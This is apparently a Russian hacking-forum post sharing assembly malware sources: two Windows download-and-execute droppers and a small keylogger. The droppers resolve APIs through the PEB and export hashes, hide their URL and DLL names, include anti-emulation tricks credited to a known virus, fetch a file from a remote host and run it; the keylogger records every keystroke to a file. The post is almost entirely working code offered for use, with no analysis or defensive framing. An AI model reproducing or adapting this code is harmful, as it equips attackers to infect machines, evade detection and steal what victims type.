MultiVPN

Сорцы на asm'e

R

r00t

Гость
Различные сорцы на асме
[MASM] Downloader Small
Код:
.386
.model flat, stdcall
option casemap :none
.data
.code
start:
call delta_jmp
delta_jmp:
pop eax
mov ebp,eax
sub ebp,offset delta_jmp
push ebp
jmp mDat
sGetProcAddress db "GetProcAddress",0
sLoadLibrary db "LoadLibraryA",0
sUrlMon db "urlmon.dll",0
sShell32 db "shell32.dll",0
sURLDownloadToFileA db "URLDownloadToFileA",0
sShellExecuteA db "ShellExecuteA",0
sExitProcess db "ExitProcess",0
sURL db "http://XXX.ru",0
sFile db "putty.exe", 0
xUrlMon dd 0
xShell32 dd 0
xShellExecuteA dd 0
xURLDownloadToFileA dd 0
xExitProcess dd 0
xGetProcAddress dd 0
xLoadLibrary dd 0
xKernelBase dd 0
mDat:
pop ebp
Call cGetProcAddress
;GetProcAddress (LoadLibraryA)
lea eax, [ebp+offset sLoadLibrary]
push eax
push [ebp+offset xKernelBase]
call [ebp+offset xGetProcAddress]
mov [ebp + offset xLoadLibrary], eax
;LoadLibrary urlmon
lea eax, [ebp+offset sUrlMon]
push eax
call [ebp + offset xLoadLibrary]
mov [ebp + offset xUrlMon], eax
;LoadLibrary shell32
lea eax, [ebp+offset sShell32]
push eax
call [ebp + offset xLoadLibrary]
mov [ebp + offset xShell32], eax
;GetProcAddress ShellExecute
lea eax, [ebp+offset sShellExecuteA]
push eax
push [ebp+offset xShell32]
call [ebp+offset xGetProcAddress]
mov [ebp + offset xShellExecuteA], eax
;GetProcAddress URLDownloadToFile
lea eax, [ebp+offset sURLDownloadToFileA]
push eax
push [ebp+offset xUrlMon]
call [ebp+offset xGetProcAddress]
mov [ebp + offset xURLDownloadToFileA], eax
;GetProcAddress URLDownloadToFile
lea eax, [ebp+offset sExitProcess]
push eax
push [ebp+offset xKernelBase]
call [ebp+offset xGetProcAddress]
mov [ebp + offset xExitProcess], eax
;Download File
push 0
push 0
lea eax, [ebp+offset sFile]
push eax
lea eax, [ebp+offset sURL]
push eax
push 0
call [ebp + offset xURLDownloadToFileA]
;Execute File
push 0
push 0
push 0
lea eax, [ebp+offset sFile]
push eax
push 0
push 0
call [ebp + offset xShellExecuteA]
;ExitProcess
push 0
call [ebp + offset xExitProcess]
cGetProcAddress:
assume fs:nothing
mov esi, FS:30h  
mov esi, [esi+ 0Ch]   
mov esi, [esi+ 1Ch]   
next_module:
mov eax, [esi+08h]	
mov edi, [esi+20h]	
mov esi, [esi]	  
cmp BYTE PTR [edi+12*2], al
jne next_module
cmp BYTE PTR [edi], 6Bh   
je find_kernel32_finished
cmp BYTE PTR[edi], 4Bh
je find_kernel32_finished
jmp next_module
find_kernel32_finished:
mov [ebp+offset xKernelBase], eax
lea edi, [ebp+offset sGetProcAddress]
mov ebx, dword ptr [ eax + 3Ch]
add ebx, eax
cmp word ptr [ebx], 4550h
jnz    find_error
mov    ebx, [ebx+78h]
add    ebx, eax
mov    ecx, [ebx+18h]
dec    ecx
mov    edx, [ebx+20h]
add    edx, eax
find_loop:
mov    esi, [edx+ecx*4]
add    esi, eax
push    edi
push    eax
push    ebx
cmp_loop:
mov    al, byte ptr [esi]
mov    bl, byte ptr [edi]
sub    al, bl
jne    cmp_different
add    bl, 0
jz		  cmp_equal
inc    esi
inc    edi
jmp    cmp_loop
cmp_different:
pop    ebx
pop    eax
pop    edi
dec ecx
cmp ecx, 0
jne find_loop
jmp   short find_error
cmp_equal:
pop    ebx
pop    eax
pop    edi
mov    edx, [ebx+24h]
add    edx, eax
mov    cx, [edx+ecx*2]
mov    edx, [ebx+1Ch]
add    edx, eax
mov    ebx, [edx+ecx*4]
add    eax, ebx
push eax
pop [ebp+offset xGetProcAddress]
ret
find_error:
xor    eax, eax
ret
end start
[MASM] Lr Downloader

Код:
.486
.model flat, stdcall
option casemap :none
.data
Host db "Zffb,!![_Y$#) [_SYWeZSU] ge![_Y$#)!+')(!eT)TeY b`Y ",0
Save db 'c:\1.png ',0
vers db 'Lr Downloader ',0
.code
include kernelbase.asm
include szTrim.asm
start:
call shit
call antiemul
push offset Host
call szTrim
call DownloadAndExecute
call exit

DownloadAndExecute:
push ebp
mov ebp, esp
sub esp, 18h
mov byte ptr [ebp-11],'u'
mov byte ptr [ebp-10],'r'
mov byte ptr [ebp-9],'l'
mov byte ptr [ebp-8],'m'
mov byte ptr [ebp-7],'o'
mov byte ptr [ebp-6],'n'
mov byte ptr [ebp-5],'.'
mov byte ptr [ebp-4],'d'
mov byte ptr [ebp-3],'l'
mov byte ptr [ebp-2],'l'
mov byte ptr [ebp-1],0
mov byte ptr [ebp-23],'s'
mov byte ptr [ebp-22],'h'
mov byte ptr [ebp-21],'e'
mov byte ptr [ebp-20],'l'
mov byte ptr [ebp-19],'l'
mov byte ptr [ebp-18],'3'
mov byte ptr [ebp-17],'2'
mov byte ptr [ebp-16],'.'
mov byte ptr [ebp-15],'d'
mov byte ptr [ebp-14],'l'
mov byte ptr [ebp-13],'l'
mov byte ptr [ebp-12],0
push offset vers
call Crypt
call GetLoadLibrary
lea eax, dword ptr [ebp-11]
push eax
call edx
push 092C3D419h
push eax
push 0
call GetProcAddr
xchg ebx, eax
push offset Host
call Crypt
xor edi, edi
push edi
push edi
push offset Save
push offset Host
push edi
call ebx

call GetLoadLibrary
lea eax, dword ptr [ebp-23]
push eax
call edx
push 0318A988Bh
push eax
push 0
call GetProcAddr
xchg ebx, eax
push 5
push edi
push edi
push offset Save
push edi
push edi
call ebx
leave
ret
Crypt proc p:dword
mov eax, p
jmp @@begin
@@:
add byte ptr [eax], 14
inc eax
@@begin:
cmp byte ptr [eax], 0
jnz @b
ret
Crypt endp

;Taken from Win32.Atix
antiemul:
push eax
db 0fh, 02fh, 0c0h; comiss
xor eax,eax ; junk
db 0fh, 02ah, 0c0h;cvtpi2ps
pop eax
retn
shit:
mov ecx,5000000
_loop:
sub eax, eax
push eax
pop ebx
xchg eax, ebx
cmp ecx, 0
dec ecx
ja _loop
retn
end start[/HTML]
[HTML] assume fs: nothing
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxx
GetKernelBase:
pushad
mov edx,dword ptr fs:[30h] ;get a pointer to the PEB
mov edx,dword ptr [edx+0Ch] ;get PEB->Ldr
mov edx,dword ptr [edx+14h] ;get the first module from the InMemoryOrder module list
next_mod:
mov esi,dword ptr [edx+28h]
push 24
pop ecx
xor edi,edi
loop_modname:
xor eax,eax
lodsb
cmp al,'a' ;some versions of Windows use lower case module names
jl not_lowercase
sub al,20h
not_lowercase:
ror edi,13
add edi,eax
loop loop_modname
cmp edi,6A4ABC5Bh
mov ebx,dword ptr [edx+10h]
mov edx,dword ptr [edx]
jne next_mod
mov dword ptr [esp+1Ch],ebx
popad
ret
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx
GetProcAddr:
push ebp
mov ebp, esp
add esp, -014h
push esi
push ebx
push edi
push edx
push ecx
mov eax, dword ptr ss:[ebp+010h]
xor edx, edx
xchg eax, edx
mov esi, 03ch
add esi, dword ptr ss:[ebp+0ch]
mov eax, dword ptr ds:[esi]
add eax, dword ptr ss:[ebp+0ch]
mov esi, dword ptr ds:[eax+078h]
add esi, 018h
add esi, dword ptr ss:[ebp+0ch]
mov eax, dword ptr ds:[esi]
mov dword ptr ss:[ebp-014h], eax
add esi, 4
lea edi, dword ptr ss:[ebp-8]
lods dword ptr ds:[esi]
add eax, dword ptr ss:[ebp+0ch]
stos dword ptr es:[edi]
mov dword ptr ss:[ebp-8], eax
lods dword ptr ds:[esi]
add eax, dword ptr ss:[ebp+0ch]
push eax
stos dword ptr es:[edi]
mov dword ptr ss:[ebp-0ch], eax
mov eax, dword ptr ds:[esi]
add eax, dword ptr ss:[ebp+0ch]
mov dword ptr ss:[ebp-010h], eax
pop esi
mov dword ptr ss:[ebp-4], 0
local_2:
mov eax, dword ptr ss:[ebp-4]
cmp dword ptr ss:[ebp-014h], eax
jnz local_7
xor eax, eax
pop ecx
pop edx
pop edi
pop ebx
pop esi
leave
retn 0ch
local_7:
push esi
mov eax, dword ptr ds:[esi]
add eax, dword ptr ss:[ebp+0ch]
xchg eax, edi
mov ebx, edi
push edi
xor al, al
local_6:
scas byte ptr es:[edi]
jnz local_6
pop esi
sub edi, ebx
push edx
cld
xor ecx, ecx
dec ecx
mov edx, ecx
local_3:
xor eax, eax
xor ebx, ebx
lods byte ptr ds:[esi]
xor al, cl
mov cl, ch
mov ch, dl
mov dl, dh
mov dh, 8
local_4:
shr bx, 1
rcr ax, 1
jnb local_5
xor ax, 08320h
xor bx, 0edb8h
local_5:
dec dh
jnz local_4
xor ecx, eax
xor edx, ebx
dec edi
jnz local_3
not edx
not ecx
mov eax, edx
rol eax, 010h
mov ax, cx
pop edx
cmp edx, eax
je local_1
pop esi
add esi, 4
add dword ptr ss:[ebp-4], 1
jmp local_2
local_1:
pop esi
mov eax, dword ptr ss:[ebp-4]
shl eax, 1
add eax, dword ptr ss:[ebp-010h]
xor esi, esi
xchg eax, esi
mov ax, word ptr ds:[esi]
shl ax, 2
add eax, dword ptr ss:[ebp-8]
xchg eax, esi
mov eax, dword ptr ds:[esi]
add eax, dword ptr ss:[ebp+0ch]
pop ecx
pop edx
pop edi
pop ebx
pop esi
leave
retn 0ch
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxx
GetLoadLibrary:
call GetKernelBase
push 04134d1adh
push eax
push 0
call GetProcAddr
mov edx, eax
ret
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
exit:
call GetKernelBase
push 040f57181h
push eax
push 0
call GetProcAddr
push 0
call eax

;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxx
[/HTML]
From masm32.lib
[HTML]
szTrim proc srcWORD
push esi
push edi
mov esi, src
mov edi, src
xor ecx, ecx
sub esi, 1
@@:
add esi, 1
cmp BYTE PTR [esi], 32 ; strip space
je @B
cmp BYTE PTR [esi], 9 ; strip tab
je @B
cmp BYTE PTR [esi], 0 ; test for zero after tabs and spaces
jne @F
xor eax, eax ; set EAX to zero on 0 length result
mov BYTE PTR [edi], 0 ; set string length to zero
jmp tsOut ; and exit
@@:
mov al, [esi+ecx] ; copy bytes from src to dst
mov [edi+ecx], al
add ecx, 1
test al, al
je @F ; exit on zero
cmp al, 33 ; don't store positions lower than 33 (32 + 9)
jb @B
mov edx, ecx ; store count if asc 33 or greater
jmp @B
@@:
mov BYTE PTR [edi+edx], 0
mov eax, edx ; return trimmed string length
mov ecx, src
tsOut:
pop edi
pop esi
ret
Fasm] Keylogger 1,50 kb

Код:
format PE GUI 5.0
entry start
include 'C:\fasm\include\win32a.inc'
log db "C:\log.txt",0
buffer db 0x100 dup (?)
bytes_escritos dd 0

start:
mov esi,7
invoke Sleep,1
jmp gogo
gogo:
cmp esi,255
je start
inc esi
invoke GetAsyncKeyState,esi
cmp eax,0
jnz logar
jmp gogo
logar:
invoke MapVirtualKey,esi,0
shl eax,16
invoke GetKeyNameText,eax,buffer,0x100

invoke  CreateFile, log, GENERIC_WRITE, 0,  NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, NULL
cmp eax,0
je exit
mov ebx,eax
invoke SetFilePointer,ebx,0,0,FILE_END
invoke lstrlen,buffer
invoke WriteFile,ebx,buffer,eax,bytes_escritos,NULL
invoke Sleep,100
invoke CloseHandle,ebx
jmp gogo
exit:
invoke ExitProcess,0

data import
library kernel,'KERNEL32.DLL',\
user,'USER32.DLL'
import kernel,\
Sleep,'Sleep',\
CreateFile,'CreateFileA',\
WriteFile,'WriteFile',\
SetFilePointer,'SetFilePointer',\
CloseHandle,'CloseHandle',\
lstrlen,'lstrlenA',\
ExitProcess,'ExitProcess'
import user,\
GetAsyncKeyState, 'GetAsyncKeyState',\
MapVirtualKey,'MapVirtualKeyA',\
GetKeyNameText,'GetKeyNameTextA'
end data
 
Сверху